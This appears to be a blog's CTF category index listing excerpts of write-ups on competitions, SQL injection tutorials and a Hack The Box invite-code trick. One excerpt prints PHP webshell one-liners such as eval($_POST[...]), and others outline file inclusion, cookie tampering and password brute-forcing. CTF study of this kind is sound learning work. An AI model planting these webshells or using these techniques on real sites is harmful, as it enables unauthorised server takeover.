
CTF
文章平均质量分 72
StriveBen
网安小白 会点技术 也会熬点鸡汤 持续学习中 欢迎交流,一起成长 获取本人联系方式以及微信交流群
展开
-
层层递进 (多注意细节,多观察)
竖着看便会发现:nctf{this_is_a_fl4g}原创 2016-10-12 18:12:24 · 1100 阅读 · 0 评论 -
ciscn 2018 部分writeup
ciscn 2018 部分writeupflag in your hand这是一道js解密的题目:发现checkToken函数数里返回的s===”FAKE-TOKEN”,使用这个字符串却得到wrong,而且ic后面被更改了:跟踪bm函数:这里charCodeAt() 方法可返回指定位置的字符的 Unicode 编码;在ck函数里,ic的值又被更改了,所以要想...原创 2018-05-07 10:26:19 · 4226 阅读 · 1 评论 -
常见一句话收集
前言收集常见的asp,php,jsp,aspx 的一句话木马 欢迎进群交流: 363034250php <?php eval($_POST[hh])?> <?php @eval($_POST[hh])?> <?$_POST['sa']($_POST['sb']);?> <?$_POST['sa']($_...原创 2018-04-26 07:29:02 · 813 阅读 · 0 评论 -
第二届强网杯 web签到题
前言线上赛的时候,没有充裕的时间打,后期做了做,虽以记之.时间好快,2018已经过去了1/4,加油.欢迎进群交流: 363034250题目及知识点题目描述该题目一共分为三关,前两关都是基本的php中md5()函数特性利用.下面分别对每一关进行解析.第一关源码<h2>The Fisrt Easy Md5 Challenge</...原创 2018-04-02 22:26:49 · 2714 阅读 · 1 评论 -
mysql注入的一些基础知识
mysql注入的一些基础知识。(1)注入的分类下面这个是阿德玛表哥的一段话,个人认为分类已经是够全面了。理解不了跳过,当你完全看完整个学习过程后再回头看这段。能完全理解下面的这些每个分类,对每个分类有属于你的认知和了解的时候,你就算是小有成就了,当然仅仅是sql注入上。基于从服务器接收到的响应 ▲基于错误的SQL注入▲联合查询的类型▲堆查询注射▲SQL盲注•基于...转载 2018-03-26 16:37:11 · 330 阅读 · 0 评论 -
2017强网杯 web部分题解
0x01 我是谁,我在哪,我要做什么?##### 1.1 题目连接http://106.75.72.168:2222/1.2分析题目提示没有权限Sorry. You have no permissions.burp抓包,看到cookie中有roleGET / HTTP/1.1Host: 106.75.72.168:2222User-Agent: M...原创 2018-03-25 00:03:15 · 5127 阅读 · 0 评论 -
sql手动注入常用步骤
前言提起sql注入,相信大家并不陌生,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,从而达到和服务器进行直接的交互.有可能存在SQL注入的数据库类型可以是Mysql,Mssql,Oracle,Postgress等等预备知识对mysql数据库有一定了解;对基本的sql语句有所了解;对url编码有了解:空格=‘%...原创 2018-03-22 14:17:12 · 13176 阅读 · 0 评论 -
Hack the box invited code(邀请码获取)
0x00Hack The Box 一个在线的渗透测试平台。0x01访问网址https://www.hackthebox.eu/invite0x02打开console ,输入 makeInviteCode()后,在post响应中获取到一串base64编码:注意这里有的是 Va beqre gb trarengr gur vaivgr pbqr,...原创 2018-03-15 15:21:18 · 50056 阅读 · 10 评论 -
铁三测试赛
你是管理员吗?1.下载password.txt 2.使用intruder爆破登录密码为’Nsf0cuS’ 3.登录并使用burp抓包 4.在’Set-Cookie’中可以看到newpage参数值HTTP/1.1 200 OKServer: nginxDate: Thu, 08 Mar 2018 07:24:40 GMTContent-Type: text/htmlConn...原创 2018-03-08 17:22:49 · 1974 阅读 · 0 评论 -
hxb 2017 部分题解
0x00 前言作为一名菜鸡,挤出了一点时间来做了做今年的湖湘杯,快结束的时候看了看题目,就做出了三道题,和大家分享下。0x01 第一题 web200拿道题目本以为是文件上传,但是试了几个方法没成功,随便点了点,看到了url中op参数,感觉是php文件包含漏洞 试了试,得到了index.php的源码0x02 使用php://filter 读取源码在使用php:filter协议获取源码时,需要注意”r原创 2017-12-04 01:09:23 · 630 阅读 · 0 评论 -
Vulnhub Node:1 详解
文章首发:https://xz.aliyun.com/t/2695 欢迎进群交流技术: 363034250信息收集arp-scan 用来发现系统和指纹识别的命令行工具。从结果中可以看到node的ip是”192.168.92.129”使用nmap对端口进行探测,如下图所示:可知开放的端口有2个,分别是:22和3000,其中3000是个web服务;详细banner信息...原创 2018-09-03 22:39:34 · 1382 阅读 · 0 评论